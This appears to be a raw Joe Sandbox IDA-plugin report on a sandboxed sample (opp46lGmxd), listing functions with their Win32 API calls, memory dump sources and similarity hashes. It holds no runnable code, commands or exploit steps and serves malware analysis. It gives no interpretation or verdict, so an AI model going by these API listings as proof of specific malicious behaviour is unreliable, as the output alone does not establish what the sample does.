                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                      • String ID: RoInitialize$combase.dll
                                                      • API String ID: 3489934621-340411864
                                                      • Opcode ID: 9acf3fe9117e04e41b219567e29c48b618a51bf256fad759455685c77b74bdf1
                                                      • Instruction ID: 26a319ac34b72333f3079b38ed8df35a4e9118851ef7cb85b9520c76561e9112
                                                      • Opcode Fuzzy Hash: 9acf3fe9117e04e41b219567e29c48b618a51bf256fad759455685c77b74bdf1
                                                      • Instruction Fuzzy Hash: D9E012B0590345EEEB20ABF0EC4DB543D94F764B03F504434B521EA4E0DBB540A38F00
                                                      Function 00A8429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00A841B8), ref: 00A842B8
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00A842BF
                                                      • EncodePointer.KERNEL32(00000000), ref: 00A842CA
                                                      • DecodePointer.KERNEL32(00A841B8), ref: 00A842E5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                      • String ID: RoUninitialize$combase.dll
                                                      • API String ID: 3489934621-2819208100
                                                      • Opcode ID: 845ce1e9e50d253bc91af9963e05516c8920e0b9e33247af079d96abd38bcf68
                                                      • Instruction ID: f4e3584cdc4809895f72f37da415129319578ba640d92ada8f9cc71c04e88efe
                                                      • Opcode Fuzzy Hash: 845ce1e9e50d253bc91af9963e05516c8920e0b9e33247af079d96abd38bcf68
                                                      • Instruction Fuzzy Hash: 75E04678681306AFEB20EBA0EE4DB403EA4F728743F104428F610EA4A0CFB04453CB04
                                                      Function 00AC675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memmove$__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 3253778849-0
                                                      • Opcode ID: b6af34302f73e7cc86d124cdaa6c703dbf7dfb6507262c8ff84fb63fda3a9fb8
                                                      • Instruction ID: 2456fcf4a85491a541dfaf6b840b09c96539c2a7a6ff8c38c672b5dc076d9849
                                                      • Opcode Fuzzy Hash: b6af34302f73e7cc86d124cdaa6c703dbf7dfb6507262c8ff84fb63fda3a9fb8
                                                      • Instruction Fuzzy Hash: 1B61BD3150065A9BCF11EF60CE82FFE37B8AF08308F054519F95A5B292DB34AD46CB91
                                                      Function 00AE046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                        • Part of subcall function 00AE10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AE0038,?,?), ref: 00AE10BC
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AE0548
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AE0588
                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00AE05AB
                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00AE05D4
                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00AE0617
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00AE0624
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                      • String ID:
                                                      • API String ID: 4046560759-0
                                                      • Opcode ID: a5b8d315f3c5444ed6bda37078655fe4e16c43863042e3323e003815e198e223
                                                      • Instruction ID: f9ee04ac44aa720364091d840e1db2097eaf91e75cad0431527a025f5f8570e4
                                                      • Opcode Fuzzy Hash: a5b8d315f3c5444ed6bda37078655fe4e16c43863042e3323e003815e198e223
                                                      • Instruction Fuzzy Hash: 91515931108280AFCB14EB65C985E6FBBF8FF88314F04891DF5859B2A2DB71E945CB52
                                                      Function 00AE5A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenu.USER32(?), ref: 00AE5A82
                                                      • GetMenuItemCount.USER32(00000000), ref: 00AE5AB9
                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00AE5AE1
                                                      • GetMenuItemID.USER32(?,?), ref: 00AE5B50
                                                      • GetSubMenu.USER32(?,?), ref: 00AE5B5E
                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00AE5BAF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountMessagePostString
                                                      • String ID:
                                                      • API String ID: 650687236-0
                                                      • Opcode ID: eefcbd0a58ac5f88f75be209e5c360cd2f038d5d54fcff08c95f4b5092e6f6a2
                                                      • Instruction ID: 22ab8da48cef47987049120f7c816fe34dc7b969d4aa88be91c4828144d51c9d
                                                      • Opcode Fuzzy Hash: eefcbd0a58ac5f88f75be209e5c360cd2f038d5d54fcff08c95f4b5092e6f6a2
                                                      • Instruction Fuzzy Hash: F0519C32E00655EFCF15EFA5D985AAEB7B4EF48324F144469F802BB351DB30AE418B90
                                                      Function 00ABF3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00ABF3F7
                                                      • VariantClear.OLEAUT32(00000013), ref: 00ABF469
                                                      • VariantClear.OLEAUT32(00000000), ref: 00ABF4C4
                                                      • _memmove.LIBCMT ref: 00ABF4EE
                                                      • VariantClear.OLEAUT32(?), ref: 00ABF53B
                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00ABF569
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                      • String ID:
                                                      • API String ID: 1101466143-0
                                                      • Opcode ID: 845341a0ca59d3850597dcd6cd6549f87dcae831d7c85c1b0c177333b947b019
                                                      • Instruction ID: adc0e765727db6da3e8f3628332ee0fc318c748bd2f7b656ae9fc82c95bca4b6
                                                      • Opcode Fuzzy Hash: 845341a0ca59d3850597dcd6cd6549f87dcae831d7c85c1b0c177333b947b019
                                                      • Instruction Fuzzy Hash: B75168B5A00209EFCB20DF58D880EAAB7B8FF4C314B158169ED59DB341D730E912CBA0
                                                      Function 00AC26F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AC2747
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AC2792
                                                      • IsMenu.USER32(00000000), ref: 00AC27B2
                                                      • CreatePopupMenu.USER32 ref: 00AC27E6
                                                      • GetMenuItemCount.USER32(000000FF), ref: 00AC2844
                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00AC2875
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                      • String ID:
                                                      • API String ID: 3311875123-0
                                                      • Opcode ID: e1830613f57cc605a75c354744263f40e4f9c1c947c3d44165438c2b2871e887
                                                      • Instruction ID: 2ffd8684900d4dd7810393ca505d245bae087a8f0686b5183f4551dd96c73dd4
                                                      • Opcode Fuzzy Hash: e1830613f57cc605a75c354744263f40e4f9c1c947c3d44165438c2b2871e887
                                                      • Instruction Fuzzy Hash: 07518B70A0034AEFDF25CFA8D988FAEBBF5AF54314F11416DE8119B291D7709944CB61
                                                      Function 00A61765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A62612: GetWindowLongW.USER32(?,000000EB), ref: 00A62623
                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 00A6179A
                                                      • GetWindowRect.USER32(?,?), ref: 00A617FE
                                                      • ScreenToClient.USER32(?,?), ref: 00A6181B
                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A6182C
                                                      • EndPaint.USER32(?,?), ref: 00A61876
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                      • String ID:
                                                      • API String ID: 1827037458-0
                                                      • Opcode ID: cc66a98da64e335d4875bc2a4b453c8813928790cdd5e0e9aeb3e062ca773e45
                                                      • Instruction ID: 963eb43d90ed3f788e496a59bc55755b5d9ad4a3605c9c1ef66733729cdcaa51
                                                      • Opcode Fuzzy Hash: cc66a98da64e335d4875bc2a4b453c8813928790cdd5e0e9aeb3e062ca773e45
                                                      • Instruction Fuzzy Hash: CF41A1702003409FDB11DF65DC84FB67BF8EB59724F080669F9958B1A1CB309C46DB61
                                                      Function 00AEB958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShowWindow.USER32(00B267B0,00000000,015956A8,?,?,00B267B0,?,00AEB862,?,?), ref: 00AEB9CC
                                                      • EnableWindow.USER32(00000000,00000000), ref: 00AEB9F0
                                                      • ShowWindow.USER32(00B267B0,00000000,015956A8,?,?,00B267B0,?,00AEB862,?,?), ref: 00AEBA50
                                                      • ShowWindow.USER32(00000000,00000004,?,00AEB862,?,?), ref: 00AEBA62
                                                      • EnableWindow.USER32(00000000,00000001), ref: 00AEBA86
                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00AEBAA9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$Show$Enable$MessageSend
                                                      • String ID:
                                                      • API String ID: 642888154-0
                                                      • Opcode ID: 988c584dc18ac9623d808d089a5c8a6d9063157221bbccdc4c68a158cab2fdcf
                                                      • Instruction ID: 60868efed84ffa669a866b459e683d355b87d3a89069a03e5002399d5da1990f
                                                      • Opcode Fuzzy Hash: 988c584dc18ac9623d808d089a5c8a6d9063157221bbccdc4c68a158cab2fdcf
                                                      • Instruction Fuzzy Hash: C9413134610281AFDF26CF55C89DBA67BE1FB05354F1841B9EA488F6A3C731A846CB61
                                                      Function 00AD73B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00AD5134,?,?,00000000,00000001), ref: 00AD73BF
                                                        • Part of subcall function 00AD3C94: GetWindowRect.USER32(?,?), ref: 00AD3CA7
                                                      • GetDesktopWindow.USER32 ref: 00AD73E9
                                                      • GetWindowRect.USER32(00000000), ref: 00AD73F0
                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00AD7422
                                                        • Part of subcall function 00AC54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AC555E
                                                      • GetCursorPos.USER32(?), ref: 00AD744E
                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00AD74AC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                      • String ID:
                                                      • API String ID: 4137160315-0
                                                      • Opcode ID: 8bc17133f769895921f0b10a9d55ebf57372fcb415c17762b998126e724964f2
                                                      • Instruction ID: 470acbf1fe33034f9187dcf92a51992c2e8a0cf48c8ff17357f451e417e9a993
                                                      • Opcode Fuzzy Hash: 8bc17133f769895921f0b10a9d55ebf57372fcb415c17762b998126e724964f2
                                                      • Instruction Fuzzy Hash: 3F31F272508345AFC724DF54C849F9FBBA9FF88314F00092AF49997291DA70EA49CB92
                                                      Function 00AB8D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00AB85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AB8608
                                                        • Part of subcall function 00AB85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AB8612
                                                        • Part of subcall function 00AB85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AB8621
                                                        • Part of subcall function 00AB85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AB8628
                                                        • Part of subcall function 00AB85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AB863E
                                                      • GetLengthSid.ADVAPI32(?,00000000,00AB8977), ref: 00AB8DAC
                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00AB8DB8
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00AB8DBF
                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00AB8DD8
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00AB8977), ref: 00AB8DEC
                                                      • HeapFree.KERNEL32(00000000), ref: 00AB8DF3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                      • String ID:
                                                      • API String ID: 3008561057-0
                                                      • Opcode ID: 7eb300e6714ed61ccee8681139aea1ba50178965343d2272a5075dd307ae636b
                                                      • Instruction ID: aec406e496dad1ab706f1b91951d2223a53163f861cf34933ff79933f37d3378
                                                      • Opcode Fuzzy Hash: 7eb300e6714ed61ccee8681139aea1ba50178965343d2272a5075dd307ae636b
                                                      • Instruction Fuzzy Hash: B511AF31501605FFDB10DFA8CC49BEE777DEF55316F10412AE94597291DB399901CB60
                                                      Function 00AB8AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00AB8B2A
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00AB8B31
                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00AB8B40
                                                      • CloseHandle.KERNEL32(00000004), ref: 00AB8B4B
                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AB8B7A
                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00AB8B8E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                      • String ID:
                                                      • API String ID: 1413079979-0
                                                      • Opcode ID: b7269c97bb5f2535b9c314568e51c5010eca183e11581ba5502e02195c778b13
                                                      • Instruction ID: 9ff971c99032a52bd3a4dccc2d0d81a41983a593969a79275ec020fc111d2698
                                                      • Opcode Fuzzy Hash: b7269c97bb5f2535b9c314568e51c5010eca183e11581ba5502e02195c778b13
                                                      • Instruction Fuzzy Hash: 3F1147B2501249AFDB01DFA8ED89FDE7BADEF48304F044064FE04A6161D7768E61EB60
                                                      Function 00AEC19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A612F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A6134D
                                                        • Part of subcall function 00A612F3: SelectObject.GDI32(?,00000000), ref: 00A6135C
                                                        • Part of subcall function 00A612F3: BeginPath.GDI32(?), ref: 00A61373
                                                        • Part of subcall function 00A612F3: SelectObject.GDI32(?,00000000), ref: 00A6139C
                                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00AEC1C4
                                                      • LineTo.GDI32(00000000,00000003,?), ref: 00AEC1D8
                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00AEC1E6
                                                      • LineTo.GDI32(00000000,00000000,?), ref: 00AEC1F6
                                                      • EndPath.GDI32(00000000), ref: 00AEC206
                                                      • StrokePath.GDI32(00000000), ref: 00AEC216
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                      • String ID:
                                                      • API String ID: 43455801-0
                                                      • Opcode ID: 65f2ca5d09702724e4f791b81318310eaae0f95d86cceb0612794297e8721bf8
                                                      • Instruction ID: d4533d63d64721e2d53226332fc972001de10ab00e84a6ac6e22b8713dbe424f
                                                      • Opcode Fuzzy Hash: 65f2ca5d09702724e4f791b81318310eaae0f95d86cceb0612794297e8721bf8
                                                      • Instruction Fuzzy Hash: E3111B7644014CFFDF11DF91DC88EEA7FADEB08364F048025BA184A161D7719E56DBA0
                                                      Function 00A803A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A803D3
                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00A803DB
                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A803E6
                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A803F1
                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00A803F9
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A80401
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Virtual
                                                      • String ID:
                                                      • API String ID: 4278518827-0
                                                      • Opcode ID: d23c84d73611756f225ed10346f69d12dd7f3722370dd43789c7fa23da31ee0c
                                                      • Instruction ID: 61fca8f46685d1d4600f8561924a1412f3e3d1cd3465b6c4ea92d69e87645161
                                                      • Opcode Fuzzy Hash: d23c84d73611756f225ed10346f69d12dd7f3722370dd43789c7fa23da31ee0c
                                                      • Instruction Fuzzy Hash: 20016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C4B941C7F5A864CBE5
                                                      Function 00AC568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00AC569B
                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00AC56B1
                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00AC56C0
                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AC56CF
                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AC56D9
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AC56E0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
